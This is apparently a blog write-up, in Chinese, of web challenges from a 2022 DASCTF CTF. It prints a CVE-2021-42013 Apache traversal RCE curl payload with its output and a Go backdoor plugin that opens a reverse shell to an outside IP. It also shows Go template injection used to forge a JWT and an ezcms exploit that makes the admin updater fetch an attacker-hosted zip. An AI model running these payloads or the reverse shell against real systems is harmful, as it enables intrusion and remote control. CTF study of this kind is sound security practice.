2022DASCTF MAY 出题人挑战赛 web wp
|
1,183
|
0
|
CTF write up

1113 字
|
16 分钟

Power Cookie

改cookie

admin:1

魔法浏览器

控制台有UA

加上去访问flag.txt即可

getme

看apache版本是这个CVE-2021-42013

直接用payload的话找到的是假flag

image-20220521134318657

发现也可以rce

curl -v --data "echo;ls /" 'node4.buuoj.cn:25956/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32
%65/bin/sh'
*   Trying 117.21.200.166:25956...
* Connected to node4.buuoj.cn (117.21.200.166) port 25956 (#0)
> POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
> Host: node4.buuoj.cn:25956
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 9
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 May 2022 12:26:03 GMT
< Server: Apache/2.4.50 (Unix)
< Transfer-Encoding: chunked
<
bin
boot
dev
diajgk
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
* Connection #0 to host node4.buuoj.cn left intact

这个目录很特别diajgk,去里面观察一下就有了

/diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg

hackme

Go题做得少,但是看到文件上传大概是上传后门一类的,搜到一篇wp

https://annevi.cn/2020/08/14/wmctf2020-gogogo-writeup/#0x04_SSRF_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96

package main
import (
   "os/exec"
)
func Read(arg string) ([]byte, error) {
   auth := arg[:7]
   cmd := arg[7:]
   if auth == "funnygo" {
       c := exec.Command("bash", "-c", cmd)
       output, err := c.CombinedOutput()
       //恢复
       re := exec.Command("bash", "-c", "cp /tmp/base.so plugins/base.so")
       re.Run()
       if err != nil {
           return nil, err
       } 
       return output, nil
   }
   return nil, nil
}
func Req(arg string) ([]byte, error){
   return nil, nil
}

				

					
				

				

					
				

				

					
				

				

					
				

			
// 伪造 cookie
package main
import (
    "github.com/gin-contrib/sessions"
    "github.com/gin-contrib/sessions/cookie"
    "github.com/gin-gonic/gin"
    "math/rand"
)
func main() {
    r := gin.Default()
    storage := cookie.NewStore(randomChar(16))
    r.Use(sessions.Sessions("o", storage))
    r.GET("/a",cookieHandler)
    r.Run("0.0.0.0:8002")
}
func cookieHandler(c *gin.Context){
    s := sessions.Default(c)
    s.Set("uname", "admin")
    s.Save()
}
func randomChar(l int) []byte {
    output := make([]byte, l)
    rand.Read(output)
    return output
}

模仿里面的go后门写了一个

package main
import (
   "os/exec"
)
func main(arg string) ([]byte, error) {
 
      c := exec.Command("bash", "-c", cmd)
       output, err := c.CombinedOutput()
       //恢复
       re := exec.Command("bash", "-c", "bash -i >& /dev/tcp/8.129.42.140/3307 0>&1")
       re.Run()
}

image-20220521141516704

以为可以了,但没想到回显Sorry there doesn't seem to be a exp.go.go file

这说明要传exp这个文件

传上去后好像不出网(也可能是我写错了)

重新构造了一个本地回显的exp1.go

package main
 
import (
    "fmt"
    "os/exec"
)
 
func main() {
    c := exec.Command("cat", "/flag")
    ret, err := c.Output()
    if err != nil {
        fmt.Println(err)
    }
    fmt.Println(string(ret))
}

http://36e9592d-d35f-4e48-bc7b-d435f6c5f706.node4.buuoj.cn:81/shortcuts?alias=exp1

image-20220521142318038

fxxkgo

看到源码中有

tpl, err := template.New("").Parse("Logged in as " + acc.id)

template模板渲染函数,没有过滤,可以尝试go ssti

{{.}}

之后访问/auth获取token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.1c8I_PzGiyonSZe3UPM2AB94x07g6DeyJW6uYA2C7eo

访问/ post:id={{.}}&pw=1

获取密钥

fasdf972u1041xu90zm10Av

放入在线网站进行伪造

image-20220521234018456

之后修改token登录获得flag

image-20220521232609444

ezcms

比赛当时时间太短我没做出来,且思路也不对,我跑去官网下载最新版然后打开beyond试图通过比较以获取补丁,再推测漏洞,或许这种做法也可以但目前没有发现

参考DASCTF MAY出题人挑战赛 MISC,WEB官方wp-魔法少女雪殇 (snowywar.top)

据说烨神开赛一个小时就ak了,膜

访问网站,获取后台admin 用户admin 密码123456,认证码123456,(这个可以审计源码得到,也可以弱口令爆破,也可以参考这篇博客利用bug登录)进入后台,简单测了一下没啥奇怪的东西,接下来看看代码

直接给结论,在\ez\html\sys\apps\controllers\admin\Update.php

有个index方法,提供了下载文件的功能,其中大致逻辑如下

image-20220530112049785

注意到sys_auth这个函数

//字符加密、解密
function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
    if(is_array($string)) $string = json_encode($string);
    if($type == 1) $string = str_replace('-','+',$string);
    $ckey_length = 4;
    $key = md5($key ? $key : Mc_Encryption_Key);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $type == 1 ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    } 
    if($type == 1) {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            $result = substr($result, 26);
            $json = json_decode($result,1);
            if(!is_numeric($result) && $json){
                return $json;
            }else{
                return $result;
            }
        }
        return '';
    }
    return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}

上面写着字符加密、解密,怀疑是与type0,1有关

结合index()代码,由于sys_auth的return的值直接作为后续请求所用的url,故此处应该为解密

本地尝试了一下(Mc_Encryption_Key跟进一下就可以找到)

测试demo

<?php
define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');
 
$strings = 'http://192.168.28.175/a.zip';
 
echo($ss = sys_auth($strings));
 
echo "<br>";
 
echo(sys_auth($ss,1));
 
echo "<br>";
 
function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
    if(is_array($string)) $string = json_encode($string);
    if($type == 1) $string = str_replace('-','+',$string);
    $ckey_length = 4;
    $key = md5($key ? $key : Mc_Encryption_Key);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $type == 1 ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    } 
    if($type == 1) {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            $result = substr($result, 26);
            $json = json_decode($result,1);
            if(!is_numeric($result) && $json){
                return $json;
            }else{
                return $result;
            }
        }
        return '';
    }
    return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}

image-20220530112146716

不难得出如下结论

image-20220530111614465

所以我们可以写脚本利用了

压缩一个含phpinfo的php文件的zip

然后用上面测试demo得到我们的url=b468YsTOW7valHVFSttuxXG6A11dpgzNzfFPNjA1-yvDfoP9V8TIcZXsp-d1CsOblwmyob/MUxZfqllsxw

(此url加密结果不唯一)

来到update控制器下的index方法进行传参(参考tp的url模式)

/admin.php/update/index?url=b468YsTOW7valHVFSttuxXG6A11dpgzNzfFPNjA1-yvDfoP9V8TIcZXsp-d1CsOblwmyob/MUxZfqllsxw

然后vps上开启python http服务

image-20220530124156165

是因为这个

if($arr['Content-Type'] !== 'application/zip') $this->msg('压缩包不zip类型文件');

我本地尝试getheader,curl去请求,发现是请求不到的

最后跑的flask脚本(或者你使用nginx也可以,正汰大神亦是如此)

from flask import Flask
from flask import send_from_directory
from flask import Flask,make_response
app = Flask(__name__)
 
@app.route('/exp.zip', methods=['GET'])
def getLogFile():
    try:
        r=''
        response = make_response(r)
        response.headers['Content-Type'] = 'application/zip'
        #强制改为这个content-type
        send_from_directory('','exp.zip')
        return response
    except Exception as e:
        return str(e)
 
app.run("0.0.0.0",2333)

本地测试一下通过了,说明应该是没问题了,

等一个有情人自己上传到Vps上去吧

访问

http://2fae786e-60d8-44c4-8a0f-3130c388374b.node4.buuoj.cn:81/exp/exp.php
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇